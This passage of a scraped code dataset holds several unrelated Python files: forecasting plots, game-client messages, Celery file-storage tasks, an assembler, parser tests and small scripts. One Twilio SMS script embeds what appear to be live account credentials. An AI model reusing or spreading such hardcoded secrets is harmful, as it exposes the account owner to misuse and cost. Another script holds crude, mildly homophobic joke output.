int,\n forecast_week_str: str,\n features_window: int = FEATURES_WINDOW,\n) -> None:\n \"\"\"Plot forecast vs target.\n\n Args:\n df: dataframe with lags, target, and forecast.\n store: store number.\n dept: department number.\n forecast_week_str: week at which forecast was\n obtained, e.g., '2012-09-07'.\n features_window: number of lags in the data.\n\n Raises:\n ValueError: if there is no such department forecasted\n at a given week in data.\n \"\"\"\n forecast_week = pd.Timestamp(forecast_week_str)\n sub_df = df[\n (df.Store == store)\n & (df.Dept == dept)\n & (df.forecast_week == forecast_week)\n ]\n if len(sub_df) == 0:\n raise ValueError(\"No such department in a dataset.\")\n max_horizon = sub_df.horizon.max()\n vis_df = pd.DataFrame(\n list(\n sub_df.iloc[0][(f\"lag_{i}\" for i in range(features_window, 0, -1))]\n )\n + list(sub_df[\"target\"]),\n columns=[\"target\"],\n ).fillna(0)\n vis_df[\"forecast\"] = sub_df.pred.set_axis(\n [i for i in range(features_window, features_window + max_horizon)]\n )\n vis_df[\"forecast\"] = vis_df[\"forecast\"].fillna(vis_df[\"target\"])\n vis_df = vis_df.set_axis(\n pd.date_range(\n add_weeks(forecast_week, -features_window + 1),\n periods=len(vis_df),\n freq=\"w\",\n )\n )\n title = (\n f\"Store {store}\\nDepartment {dept}\\n\"\n f\"forecast obtained in {forecast_week.strftime('%Y-%m-%d')}\"\n 
)\n    vis_df[[\"forecast\", \"target\"]].plot(\n        title=title, xlabel=\"date\", ylabel=\"weekly sales\"\n    )\n","repo_name":"astraszab/walmart-sales","sub_path":"src/walmart_sales/visualization/plot_forecast_vs_target.py","file_name":"plot_forecast_vs_target.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"44016705149","text":"import constants\nimport platform\nimport json\n\ndef get_client_info():\n    # use one consistent dict name throughout (the original initialised\n    # client_info but then assigned to client_info_msg, raising a NameError)\n    client_info_msg = {}\n    client_info_msg[\"type\"] = constants.CLIENT_INFO\n    client_info_msg[\"language\"] = \"python\"\n    client_info_msg[\"languageVersion\"] = platform.python_version()\n    client_info_msg[\"operatingSystem\"] = platform.system()\n    client_info_msg[\"operatingSystemVersion\"] = platform.release()\n    client_info_msg[\"clientVersion\"] = \"1.0\"\n    return json.dumps(client_info_msg)\n\n\ndef default_game_settings():\n    game_settings = {}\n    game_settings[\"maxNoofPlayers\"] = 5\n    game_settings[\"startSnakeLenth\"] = 1\n    game_settings[\"timeInMsPerTick\"] = 250\n    game_settings[\"obstaclesEnabled\"] = True\n    game_settings[\"foodEnabled\"] = True\n    game_settings[\"headToTailConsumes\"] = True\n    game_settings[\"tailConsumeGrows\"] = False\n    game_settings[\"addFoodLikelihood\"] = 15\n    game_settings[\"removeFoodLikelihood\"] = 5\n    game_settings[\"spontaneousGrowthEveryNWorldTick\"] = 3\n    game_settings[\"trainingGame\"] = False\n    game_settings[\"pointsPerLength\"] = 1\n    game_settings[\"pointsPerFood\"] = 2\n    game_settings[\"pointsPerCausedDeath\"] = 5\n    game_settings[\"pointsPerNibble\"] = 10\n    game_settings[\"noofRoundsTailProtectedAfterNibble\"] = 3\n\n    return game_settings\n\ndef register_move(next_move, incoming_data):\n    register_move_msg = {}\n    register_move_msg[\"type\"] = constants.REGISTER_MOVE\n    register_move_msg[\"direction\"] = next_move\n    register_move_msg[\"gameTick\"] = incoming_data[\"gameTick\"]\n    register_move_msg[\"receivingPlayerId\"] = incoming_data[\"receivingPlayerId\"]\n    register_move_msg[\"gameId\"] = incoming_data[\"gameId\"]\n\n    return json.dumps(register_move_msg)\n\ndef start_game():\n    start_game_msg = {}\n    start_game_msg[\"type\"] = constants.START_GAME\n\n    return json.dumps(start_game_msg)\n\ndef register_player(name):\n    reg_msg = {}\n    reg_msg[\"type\"] = constants.REGISTER_PLAYER_MESSAGE_TYPE\n    reg_msg[\"playerName\"] = name\n    reg_msg[\"gameSettings\"] = default_game_settings()\n\n    return json.dumps(reg_msg)\n","repo_name":"Hagesjo/snakebot-client-python","sub_path":"messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"7115521310","text":"import os\nimport shutil\nimport subprocess\nfrom urllib.parse import urljoin\n\nfrom django.urls import reverse\nfrom celery import shared_task\nfrom celery.exceptions import MaxRetriesExceededError\n\nfrom kantele import settings\nfrom jobs.post import update_db, taskfail_update_db\nfrom analysis.tasks import create_runname_dir, prepare_nextflow_run, run_nextflow, transfer_resultfile, check_in_transfer_client\nfrom rawstatus.tasks import calc_md5, delete_empty_dir\n\n# Updating stuff in tasks happens over the API, assume no DB is touched. 
This\n# avoids setting up auth for DB\n\n\n@shared_task(bind=True, queue=settings.QUEUE_NXF)\ndef run_convert_mzml_nf(self, run, params, raws, ftype_name, nf_version, profiles, **kwargs):\n postdata = {'client_id': settings.APIKEY, 'task': self.request.id}\n rundir = create_runname_dir(run, run['dset_id'], 'convert_mzml', run['timestamp'])\n params, gitwfdir, stagedir = prepare_nextflow_run(run, self.request.id, rundir, {'--raws': raws}, [], params)\n try:\n run_outdir = run_nextflow(run, params, rundir, gitwfdir, profiles, nf_version)\n except subprocess.CalledProcessError as e:\n # FIXME report stderr with e\n errmsg = 'OUTPUT:\\n{}\\nERROR:\\n{}'.format(e.stdout, e.stderr)\n taskfail_update_db(self.request.id, errmsg)\n raise RuntimeError('Error occurred converting mzML files: '\n '{}\\n\\nERROR MESSAGE:\\n{}'.format(rundir, errmsg))\n transfer_url = urljoin(settings.KANTELEHOST, reverse('jobs:mzmlfiledone'))\n resultfiles = {}\n outpath = os.path.split(rundir)[-1]\n outfullpath = os.path.join(settings.SHAREMAP[run['dstsharename']], outpath)\n try:\n os.makedirs(outfullpath, exist_ok=True)\n except (OSError, PermissionError):\n taskfail_update_db(self.request.id, 'Could not create output directory for analysis results')\n raise\n token = False\n for raw in raws:\n token = check_in_transfer_client(self.request.id, token, ftype_name)\n fname = os.path.splitext(raw[2])[0] + '.mzML'\n srcpath = os.path.join(run_outdir, fname)\n fdata = {'md5': calc_md5(srcpath), 'file_id': raw[3], 'newname': fname}\n transfer_resultfile(outfullpath, outpath, srcpath, run['dstsharename'],\n fdata, transfer_url, token, self.request.id)\n # FIXME first check tstate so no dup transfers used?\n # TODO we're only reporting task finished in this POST call, but there is no specific route\n # for that.\n url = urljoin(settings.KANTELEHOST, reverse('jobs:updatestorage'))\n update_db(url, json=postdata)\n shutil.rmtree(rundir)\n shutil.rmtree(stagedir)\n\n\n@shared_task(bind=True, queue=settings.QUEUE_STORAGE)\ndef rename_top_level_project_storage_dir(self, projsharename, srcname, newname, proj_id, sf_ids):\n \"\"\"Renames a project, including the below experiments/datasets\"\"\"\n msg = False\n projectshare = settings.SHAREMAP[projsharename]\n srcpath = os.path.join(projectshare, srcname)\n dstpath = os.path.join(projectshare, newname)\n if not os.path.exists(srcpath):\n msg = f'Cannot move project name {srcname} to {newname}, does not exist'\n elif not os.path.isdir(srcpath):\n msg = f'Cannot move project name {srcname} to {newname}, {srcname} is not a directory'\n elif os.path.exists(dstpath):\n msg = f'Cannot move project name {srcname} to {newname}, already exists'\n if msg:\n taskfail_update_db(self.request.id, msg)\n raise RuntimeError(msg)\n try:\n os.rename(srcpath, dstpath)\n except NotADirectoryError:\n taskfail_update_db(self.request.id, msg=f'Failed renaming project {srcpath} is a directory '\n f'but {dstpath} is a file')\n raise\n except Exception:\n taskfail_update_db(self.request.id, msg='Failed renaming project for unknown reason')\n raise\n postdata = {'proj_id': proj_id, 'newname': newname, 'sf_ids': sf_ids,\n 'task': self.request.id, 'client_id': settings.APIKEY}\n url = urljoin(settings.KANTELEHOST, reverse('jobs:renameproject'))\n update_db(url, json=postdata)\n\n@shared_task(bind=True, queue=settings.QUEUE_FILE_DOWNLOAD)\ndef rsync_dset_servershare(self, dset_id, srcsharename, srcpath, dstsharename, fns, upd_sf_ids):\n '''Uses rsync to copy a dataset to other servershare. 
E.g in case of consolidating\n projects to a certain share, or when e.g. moving to new storage unit. Files are rsynced\n one at a time, to avoid rsyncing files removed from dset before running this job,\n and avoiding files added to dset updating servershare post-job'''\n srcdir = os.path.join(settings.SHAREMAP[srcsharename], srcpath)\n dstdir = os.path.join(settings.SHAREMAP[dstsharename], srcpath)\n try:\n os.makedirs(dstdir, exist_ok=True)\n except Exception:\n taskfail_update_db(self.request.id)\n raise\n for srcfn in fns:\n cmd = ['rsync', '-avz', os.path.join(srcdir, srcfn), dstdir]\n try:\n subprocess.run(cmd, check=True)\n except subprocess.CalledProcessError:\n print('Failed to run', cmd)\n try:\n self.retry(countdown=60)\n except MaxRetriesExceededError:\n taskfail_update_db(self.request.id)\n raise\n # delete files in source dir after rsyncing ALL files (else task is not retryable)\n for srcfn in fns:\n os.unlink(os.path.join(srcdir, srcfn))\n delete_empty_dir(srcsharename, srcpath) # pylint: disable=E1120\n # report finished\n fnpostdata = {'fn_ids': upd_sf_ids, 'servershare': dstsharename,\n 'dst_path': srcpath, 'client_id': settings.APIKEY, 'task': self.request.id}\n dspostdata = {'storage_loc': srcpath, 'dset_id': dset_id, 'newsharename': dstsharename,\n 'task': self.request.id, 'client_id': settings.APIKEY}\n fnurl = urljoin(settings.KANTELEHOST, reverse('jobs:updatestorage'))\n dsurl = urljoin(settings.KANTELEHOST, reverse('jobs:update_ds_storage'))\n update_db(fnurl, json=fnpostdata)\n update_db(dsurl, json=dspostdata)\n\n\n@shared_task(bind=True, queue=settings.QUEUE_STORAGE)\ndef rename_dset_storage_location(self, ds_sharename, srcpath, dstpath, dset_id, sf_ids):\n \"\"\"This expects one dataset per dir, as it will rename the whole dir\"\"\"\n print(f'Renaming dataset storage {srcpath} to {dstpath}')\n ds_share = settings.SHAREMAP[ds_sharename]\n srcfull = os.path.join(ds_share, srcpath)\n dstfull = os.path.join(ds_share, dstpath)\n try:\n os.renames(srcfull, dstfull)\n except NotADirectoryError:\n taskfail_update_db(self.request.id, msg=f'Failed renaming project {srcfull} is a directory '\n f'but {dstfull} is a file')\n raise\n except Exception:\n taskfail_update_db(self.request.id, msg=f'Failed renaming dataset location {srcfull} '\n f'to {dstfull} for unknown reason')\n raise\n # Go through dirs in path and delete empty ones caused by move\n splitpath = srcpath.split(os.sep)\n for pathlen in range(0, len(splitpath))[::-1]:\n # no rmdir on the leaf dir (would be pathlen+1) since that's been moved\n checkpath = os.path.join(ds_share, os.sep.join(splitpath[:pathlen]))\n if os.path.exists(checkpath) and os.path.isdir(checkpath) and not os.listdir(checkpath):\n try:\n os.rmdir(checkpath)\n except:\n taskfail_update_db(self.request.id)\n raise\n fn_postdata = {'fn_ids': sf_ids, 'dst_path': dstpath, \n 'client_id': settings.APIKEY}\n ds_postdata = {'storage_loc': dstpath, 'dset_id': dset_id, 'newsharename': False,\n 'task': self.request.id, 'client_id': settings.APIKEY}\n fnurl = urljoin(settings.KANTELEHOST, reverse('jobs:updatestorage'))\n dsurl = urljoin(settings.KANTELEHOST, reverse('jobs:update_ds_storage'))\n try:\n update_db(fnurl, json=fn_postdata)\n update_db(dsurl, json=ds_postdata)\n except RuntimeError:\n # FIXME cannot move back shutil.move(dst, src)\n raise\n\n\n@shared_task(bind=True, queue=settings.QUEUE_STORAGE)\ndef move_file_storage(self, fn, srcshare, srcpath, dstpath, fn_id, dstsharename, newname=False):\n '''Moves file across server shares, dirs, or as 
rename'''\n    src = os.path.join(settings.SHAREMAP[srcshare], srcpath, fn)\n    dstfn = newname or fn\n    dst = os.path.join(settings.SHAREMAP[dstsharename], dstpath, dstfn)\n    url = urljoin(settings.KANTELEHOST, reverse('jobs:updatestorage'))\n    if src == dst:\n        print('Source and destination are identical, not moving file')\n        update_db(url, json={'client_id': settings.APIKEY, 'task': self.request.id})\n        # nothing to move, report the task as done and stop here\n        return\n    print('Moving file {} to {}'.format(src, dst))\n    dstdir = os.path.split(dst)[0]\n    try:\n        os.makedirs(dstdir, exist_ok=True)\n    except Exception:\n        taskfail_update_db(self.request.id)\n        raise\n    if not os.path.isdir(dstdir):\n        taskfail_update_db(self.request.id)\n        raise RuntimeError('Directory {} is already on disk as a file name. '\n                'Not moving files.'.format(dstdir))\n    try:\n        shutil.move(src, dst)\n    except Exception as e:\n        taskfail_update_db(self.request.id)\n        raise RuntimeError('Could not move file to storage:', e)\n    postdata = {'fn_id': fn_id, 'servershare': dstsharename, 'dst_path': dstpath,\n                'client_id': settings.APIKEY, 'task': self.request.id}\n    if newname:\n        postdata['newname'] = newname\n    try:\n        update_db(url, json=postdata)\n    except RuntimeError:\n        shutil.move(dst, src)\n        raise\n    print('File {} moved to {}'.format(fn_id, dst))\n\n\n@shared_task(bind=True, queue=settings.QUEUE_STORAGE)\ndef move_stored_file_tmp(self, sharename, fn, path, fn_id):\n    src = os.path.join(settings.SHAREMAP[sharename], path, fn)\n    dst = os.path.join(settings.TMPSHARE, fn)\n    print('Moving stored file {} to tmp'.format(fn_id))\n    try:\n        shutil.move(src, dst)\n    except Exception:\n        taskfail_update_db(self.request.id)\n        raise\n    postdata = {'fn_id': fn_id, 'servershare': settings.TMPSHARENAME,\n                'dst_path': '', 'client_id': settings.APIKEY,\n                'task': self.request.id}\n    url = urljoin(settings.KANTELEHOST, reverse('jobs:updatestorage'))\n    try:\n        update_db(url, json=postdata)\n    except RuntimeError:\n        shutil.move(dst, src)\n        raise\n    print('File {} moved to tmp and DB updated'.format(fn_id))\n","repo_name":"glormph/kantele","sub_path":"src/backend/datasets/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":10463,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"}
{"seq_id":"15017006335","text":"import json\n\nimport requests\nfrom packaging.version import parse\nPYPI_API_URL_PATTERN = 'https://pypi.python.org/pypi/{package}/json'\n\n\ndef get_package_last_version(package_name: str) -> str:\n\n    req = requests.get(PYPI_API_URL_PATTERN.format(package=package_name))\n    req.raise_for_status()\n    j = json.loads(req.text)\n    raw_releases = j.get('releases', [])\n    all_releases = sorted([parse(r) for r in raw_releases\n                           if not parse(r).is_prerelease])\n    return all_releases[-1].base_version\n","repo_name":"vertliba/safe-pip-upgrade","sub_path":"tests/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"}
{"seq_id":"19514815377","text":"from src import Gallery, AppLogException\nfrom src.general import Status\n\n\nclass GalleryService:\n\n    def __init__(self, gallery=Gallery()):\n        self.gallery = gallery\n\n    def create(self):\n        data = GalleryService(gallery=self.gallery.items_id)\n        if data.gallery.items_id is None:\n            raise AppLogException(Status.item_does_not_exists())\n        self.gallery.add()\n        self.gallery.flush()\n\n        return Status.successfully_processed()\n\n    def alter(self):\n        data = GalleryService.get_one(_id=self.gallery.id)\n\n        if data.gallery is None:\n            raise 
AppLogException(Status.gallery_does_not_exists())\n\n self.gallery = data.gallery\n self.gallery.update()\n self.gallery.commit_or_rollback()\n\n return Status.successfully_processed()\n\n @classmethod\n def get_one(cls, _id):\n return cls(gallery=Gallery.query.get_one(_id=_id))\n\n @staticmethod\n def delete_all_by_item_without_this(\n item_id, gallery_for_exclude):\n Gallery.query.delete_all_by_item_exclude_this(\n item_id=item_id, gallery_for_exclude=gallery_for_exclude\n )\n","repo_name":"mraic/administration-app","sub_path":"src/domain/gallery_service.py","file_name":"gallery_service.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5084665628","text":"class Solution:\n def removeKdigits(self, num: str, k: int) -> str:\n if len(num)==k:\n return '0'\n stack=[]\n top=-1\n for i,value in enumerate(num):\n while k!=0 and top>-1 and stack[top]>value:\n k=k-1\n top=top-1\n stack.pop()\n stack.append(value)\n top=top+1\n stack=stack[:len(stack)-k]\n ans=''\n for value in stack:\n ans=ans+value\n return str(int(ans))","repo_name":"yohanse/A2SV","sub_path":"Remove K Digits.py","file_name":"Remove K Digits.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40451354451","text":"from twilio.rest import Client\n\naccount_sid = 'ACc2b1bd25252932ce8b7c21519b5cadfe'\nauth_token = 'c49155886ae96cee7e63590ede3960e3'\n\nclient = Client(account_sid, auth_token)\n\ntwilio_number = '+12058275297'\ntarget_number = input(\"Please Enter the Pakistani phone number: \")\nmessage_body = input(\"Please Enter the SMS content: \")\n\nmessage = client.messages.create(\n body=message_body,\n from_=twilio_number,\n to='+92' + target_number\n)\n\nprint(message.body)\n","repo_name":"owsym/sms-sender-by-twilio","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"} +{"seq_id":"32105901066","text":"# class test():\n# \tpass\n#\n# print(test() == test())\n# print(id(test())== id(test()))\n\n# import threading\n#\n# sum = 0\n# # loopSum = 200000\n# loopSum = 3\n#\n# def myAdd():\n# \tglobal sum, loopSum\n# \tfor i in range(1, loopSum):\n# \t\tsum += 1\n# \t\tprint('InAdd: ', sum)\n#\n#\n# def myMinu():\n# \tglobal sum, loopSum\n# \tfor i in range(1, loopSum):\n# \t\tsum -= 1\n# \t\tprint('InMinu: ', sum)\n#\n#\n# if __name__ == '__main__':\n# \tprint(\"Starting ....{0}\".format(sum))\n#\n# \t# 开始多线程的实例,看执行结果是否一样\n# \tt1 = threading.Thread(target=myAdd, args=())\n# \tt2 = threading.Thread(target=myMinu, args=())\n#\n# \tt1.start()\n# \tt2.start()\n#\n# \tt1.join()\n# \tt2.join()\n#\n# \tprint(\"Done .... {0}\".format(sum))\n\n\nimport os\nfrom multiprocessing import Process\n\n\n# def run_proc(name):\n# \tprint('Child process %s (%s) running' %(name, os.getpid()))\n#\n#\n# if __name__ == '__main__':\n# \tprint('Parent Process %s' % os.getpid())\n# \tfor i in range(3):\n# \t\tp = Process(target=run_proc, args=(str(i), ))\n# \t\tprint('Process will start')\n# \t\tp.start()\n# \tp.join()\n# \tprint('Process end.')\n\n\ndef consumer():\n\tr = ''\n\twhile True:\n\t\tn = yield r\n\t\tif not n:\n\t\t\treturn\n\t\tprint('[CONSUMER]Consuming %s...' % n)\n\t\tr = '200 OK'\n\n\ndef produce(c):\n\tc.send(None)\n\tn = 0\n\twhile n < 5:\n\t\tn += 1\n\t\tprint('[PRODUCER]Producing %s...' 
%n)\n\t\tr = c.send(n)\n\t\tprint('[PRODUCER]Consumer return: %s...' %n)\n\tc.close()\n\n\nif __name__ == '__main__':\n\tc = consumer()\n\tproduce(c)\n\tprint(type(c))\n","repo_name":"Airseai6/test","sub_path":"test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"10050946319","text":"import random \r\nfrom playsound import playsound \r\nimport time\r\nimport numpy\r\n\r\n\r\n\r\nvalores = [\"Si\" ,\"No\" , \"Si\",\"No\"]\r\n\r\n\r\n\r\ndef azar_si_no(valores):\r\n\r\n return numpy.random.choice(valores)\r\n\r\n\r\n\r\nnombre = input(\"ingresa tu nombre\")\r\nmedida = random.randint(5,30)\r\ngay_o_no = random.randint(1,2) \r\ncomplemento =\" tu tula es...\"\r\n\r\nif azar_si_no == \"Si\":\r\n print(nombre + \"...\" \"Deja la paja\") \r\n playsound(\"meme-plantilla (mp3cut.net).mp3\")\r\nelse:\r\n print(nombre + \"...\" \"Eres gay bro UnU\") \r\n playsound(\"gay-meme.mp3\")\r\ntime.sleep(1.3)\r\n\r\n\r\n\r\nif medida > 15:\r\n\r\n print(nombre + \"...\" + complemento + \"grande\" )\r\n playsound('yamete-kudasai-sound-effect-original.mp3') \r\nelse:\r\n print(nombre + \"...\" + complemento + \"chica\" )\r\n playsound('mona sad unu.mp3')\r\n\r\n\r\n\r\n","repo_name":"hectormra23/tula_random","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"39943049289","text":"from parser import *\nfrom sys import exit\n\nmnemonics = {'HLT':0x00, 'NOP':0x01, 'CLR':0x02, 'DMP':0x03,\n 'OUT':0x04, \n \n 'ADD':0x10, 'SUB':0x11, 'MUL':0x12, 'DIV':0x13,\n 'MOD':0x14, 'AND':0x15, 'OR':0x16, 'XOR':0x17,\n 'CMP':0x18, 'INC':0x19, 'DEC':0x1A,\n \n 'MOV':0x20, 'SWP':0x21, 'CPY':0x22,\n \n 'JMP':0x31, 'JAL':0x32, 'RET':0x33,\n 'BEQ':0x34, 'BNE':0x35, 'BGT':0x36, 'BGE':0x37,\n 'BIE':0x38, 'BDE':0x39, 'BAO':0x3A, 'BAC':0x3B}\n\nmaxArgs = {'HLT':0, 'NOP':0, 'CLR':1, 'DMP':1,\n 'OUT':2, \n \n 'ADD':3, 'SUB':3, 'MUL':4, 'DIV':4,\n 'MOD':3, 'AND':3, 'OR':3, 'XOR':3,\n 'CMP':2, 'INC':1, 'DEC':1,\n \n 'MOV':2, 'SWP':2, 'CPY':4,\n \n 'JMP':1, 'JAL':1, 'RET':0,\n 'BEQ':3, 'BNE':3, 'BGT':3, 'BGE':3,\n 'BIE':3, 'BDE':3, 'BAO':1, 'BAC':1}\n\nregNrs = {'R0':0x00, 'R1':0x01, 'R2':0x02, 'R3':0x03,\n 'R4':0x04, 'R5':0x05, 'R6':0x06, 'R7':0x07,\n 'R8':0x08, 'R9':0x09, 'RA':0x0A, 'RB':0x0B,\n 'PR':0x0C, 'PB':0x0D, 'PS':0x0E, 'PC':0x0F,\n\n 'r0':0x00, 'r1':0x01, 'r2':0x02, 'r3':0x03,\n 'r4':0x04, 'r5':0x05, 'r6':0x06, 'r7':0x07,\n 'r8':0x08, 'r9':0x09, 'rA':0x0A, 'rB':0x0B,\n 'pR':0x0C, 'pB':0x0D, 'pS':0x0E}\n\ndef argSize(arg):\n global regNrs\n argType = arg[0]\n arg = arg[1:]\n\n if argType == 'REG' or argType == 'IDR' or argType == 'INC' or argType == 'DEC':\n # Get the register number\n rNr = arg[0].val\n if rNr in regNrs:\n rNr = regNrs[rNr]\n \n # Return 1 on quick register, 2 on slow register\n if rNr == 0x00 or rNr == 0x01 or rNr == 0x0D:\n return 1\n return 2\n if argType == 'IMM' or argType == 'ABS' or argType == 'IDM':\n return 5 # Return max size\n if argType == 'IDX':\n sz = 1\n\n # Get the first register's number\n rNr = arg[0].val\n if rNr in regNrs:\n rNr = regNrs[rNr]\n \n # Increment size for slow register\n if not(rNr == 0x00 or rNr == 0x01 or rNr == 0x0D):\n sz += 1\n\n # Get the second register's number\n rNr = arg[1].val\n if rNr in regNrs:\n rNr = regNrs[rNr]\n \n # Increment size for slow register\n if not(rNr == 0x00 or rNr == 0x01 or rNr 
== 0x0D):\n sz += 1\n \n return sz\n \n if argType == 'DSP':\n sz = 5 # Basic size of lead-in and immediate\n # Get the register's number\n rNr = arg[1].val\n if rNr in regNrs:\n rNr = regNrs[rNr]\n \n # Increment size for slow register\n if not(rNr == 0x00 or rNr == 0x01 or rNr == 0x0D):\n sz += 1\n \n return sz\n\n\n\n print(argType + \": \" + str(arg))\n return 1\n\ndef instrSizeFxn(instrToks):\n global mnemonics, maxArgs\n\n if len(instrToks) == 0:\n return 0\n \n mnemonic, args = getArgs(instrToks)\n mnemonic = mnemonic.upper()\n\n if mnemonic not in mnemonics:\n print(\"ERROR in line \" + str(instrToks[0].lineNr) + \": unknown mnemonic \" + str(mnemonic))\n exit(1)\n\n argMax = maxArgs[mnemonic]\n\n sz = 1 # Argument byte\n if len(args) < argMax:\n sz += 1 # End of args byte\n\n for arg in args:\n sz += argSize(arg)\n\n return sz\n\ndef encodeImm(val):\n argStr = ''\n \n for i in range(0, 4):\n argStr += ' ' + hex(val & 0xFF)[2:]\n val = val >> 8\n \n return argStr\n\ndef encodeReg(argByte, rNr):\n argStr = ''\n nWords = 0\n\n if rNr == 0:\n argByte = argByte | 0x00\n elif rNr == 1:\n argByte = argByte | 0x04\n elif rNr == 0x0D:\n argByte = argByte | 0x08\n else:\n argByte = argByte | 0x0C\n argStr = ' ' + hex(rNr)[2:]\n nWords += 1\n \n argStr = hex(argByte)[2:] + argStr\n nWords += 1\n\n return argStr, nWords\n\n\ndef encodeArg(arg, incAmt = 4):\n argStr = \"\"\n nWords = 0\n\n if arg[0] == 'REG':\n argStr, nWords = encodeReg(0x33, arg[1] - 1)\n \n elif arg[0] == 'IMM':\n argStr = '23'\n nWords += 5\n argStr += encodeImm(arg[1])\n \n elif arg[0] == 'ABS':\n argStr = '83'\n nWords += 5\n argStr += encodeImm(arg[1])\n\n elif arg[0] == 'IDR':\n argStr, nWords = encodeReg(0x43, arg[1] - 1)\n\n elif arg[0] == 'IDM':\n argStr = '53'\n nWords += 5\n argStr += encodeImm(arg[1])\n \n elif arg[0] == 'IDX':\n argStr = ''\n argByte = 0x60\n\n rNr = arg[1] - 1\n if rNr == 0:\n argByte = argByte | 0x00\n elif rNr == 1:\n argByte = argByte | 0x04\n elif rNr == 0x0D:\n argByte = argByte | 0x08\n else:\n argByte = argByte | 0x0C\n argStr = ' ' + hex(rNr)[2:]\n nWords += 1\n \n rNr = arg[2] - 1\n if rNr == 0:\n argByte = argByte | 0x00\n elif rNr == 1:\n argByte = argByte | 0x01\n elif rNr == 0x0D:\n argByte = argByte | 0x02\n else:\n argByte = argByte | 0x03\n argStr = ' ' + hex(rNr)[2:]\n nWords += 1\n \n argStr = hex(argByte)[2:] + argStr\n nWords += 1\n\n elif arg[0] == 'DSP':\n argStr, nWords = encodeReg(0x73, arg[2] - 1)\n argStr += encodeImm(arg[1])\n nWords += 4\n\n elif arg[0] == 'INC':\n argByte = 0x90 | (incAmt - 1)\n argStr, nWords = encodeReg(argByte, arg[1] - 1)\n elif arg[0] == 'DEC':\n argByte = 0xA0 | (incAmt - 1)\n argStr, nWords = encodeReg(argByte, arg[1] - 1)\n else:\n print(arg)\n\n return argStr, nWords\n\ndef encodeInst(inst, codePos):\n global mnemonics, maxArgs\n line = \"\"\n nWords = 1\n \n mnemonic = inst[0].upper()\n args = inst[1]\n\n # Insert the mnemonic into the instruction\n if mnemonic not in mnemonics:\n print(\"ERROR: Unrecognized mnemonic \" + mnemonic)\n exit(-1)\n line = hex(mnemonics[mnemonic])[2:]\n\n # Insert each arg into the instruction\n for arg in args:\n argStr, argWords = encodeArg(arg)\n line += ' ' + argStr\n nWords += argWords\n\n # Insert explicit end of args\n if maxArgs[mnemonic] != len(args):\n line += ' 0'\n nWords += 1\n\n # Apply the positioning information\n line = hex(codePos)[2:] + ' ' + hex(nWords)[2:] + ' ' + line\n return line, nWords\n \n\ndef encode(instrs, dataInit, codeBase, dataBase):\n codePos = codeBase\n for inst in instrs:\n 
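# encodeInst returns the emitted line as '<start addr> <word count> <bytes...>'\n        # in hex; nWords advances codePos so instructions are placed contiguously\n        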
line, nWords = encodeInst(inst, codePos)\n print(line)\n codePos += nWords\n\n for i in range(0, len(dataInit)):\n value, width, offset = dataInit[i]\n print(hex(dataBase + offset)[2:] + ' ' + hex(width)[2:], end='')\n \n for j in range(0, width):\n print(' ' + hex(value & 0xFF)[2:], end='')\n value = value >> 8\n print()\n print(hex(codeBase - 1)[2:])\n\ndef main():\n toks = clean()\n dataLabels, dataInit = dataOffsets(toks)\n codeLabels, codePos = codeOffsets(toks, instrSizeFxn)\n codePos = codePos + 4\n\n for codeLabel in codeLabels:\n codeLabels[codeLabel] -= 1\n\n for reg in regNrs:\n if reg in codeLabels or reg in dataLabels:\n print(\"Register mnemonic \" + reg + \" overrides existing label\")\n return -1\n codeLabels[reg] = regNrs[reg]\n\n instrs = getInstrs(toks, 1, codeLabels, codePos, dataLabels)\n encode(instrs, dataInit, 1, codePos)\n\nmain()\n","repo_name":"rmh2805/CompArchProject","sub_path":"Asm/Assembler/worseVAX.py","file_name":"worseVAX.py","file_ext":"py","file_size_in_byte":7699,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"11809727331","text":"\"\"\"\ntests.parsers.industry\n~~~~~~~~~~~~~~~~~~~~~~\nIndustry table tests\n\n\"\"\"\nfrom evepaste import parse_industry\nfrom tests import TableTestGroup\n\n\nINDUSTRY_TABLE = TableTestGroup(parse_industry)\nINDUSTRY_TABLE.add_test('''Tritanium (4662 Units)\nPyerite (1857 Units)\nMexallon (1027 Units)\nIsogen (44 Units)\nNocxium (51 Units)''', ([\n {'name': 'Isogen', 'quantity': 44},\n {'name': 'Mexallon', 'quantity': 1027},\n {'name': 'Nocxium', 'quantity': 51},\n {'name': 'Pyerite', 'quantity': 1857},\n {'name': 'Tritanium', 'quantity': 4662}],\n []))\n\nINDUSTRY_TABLE.add_test('''Strontuim Clathrates (1 Unit)''',\n ([{'name': 'Strontuim Clathrates', 'quantity': 1}],\n []))\n","repo_name":"evepraisal/evepaste","sub_path":"tests/parsers/industry.py","file_name":"industry.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"29"} +{"seq_id":"18152664106","text":"from __future__ import absolute_import, division, print_function\nimport barnaba as bb\nimport barnaba.definitions as dd\nimport os\nfrom comp_mine import comp\n\ncwd = os.getcwd()\noutdir = \"%s/test/tmp\" % cwd\nrefdir = \"%s/test/reference/\" % cwd\nos.system(\"mkdir %s\" % (outdir))\n\nfname = \"%s/test/data/sample1.pdb\" % cwd\nfname1 = 